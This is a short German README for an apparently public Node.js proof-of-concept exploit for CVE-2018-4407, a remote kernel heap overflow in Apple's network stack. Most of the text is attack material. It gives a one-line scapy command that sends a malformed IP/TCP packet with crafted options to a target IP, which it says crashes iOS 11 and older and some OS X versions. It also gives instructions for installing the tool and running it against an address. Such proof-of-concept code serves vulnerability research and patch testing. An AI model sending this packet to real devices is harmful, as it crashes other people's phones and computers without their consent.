
Node.js PoC Exploit-Code für CVE-2018-4407
Node.js PoC-Exploit-Code für CVE-2018-4407
Autor: Sam Decrock
Dieses Skript basiert auf dem scapy-Skript von Zuk:
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in einem Tweet:
— Zuk (@ihackbanme) 1. November 2018
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Es bringt Geräte mit iOS 11 oder früher sowie einige Versionen von OS X zum Absturz.
Um die benötigten Module zu installieren, führe aus:
npm install
Zum Ausführen übergib die Ziel-IP-Adresse als Argument:
node attack.js 192.168.1.20
Originalartikel von Kevin Backhouse: https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407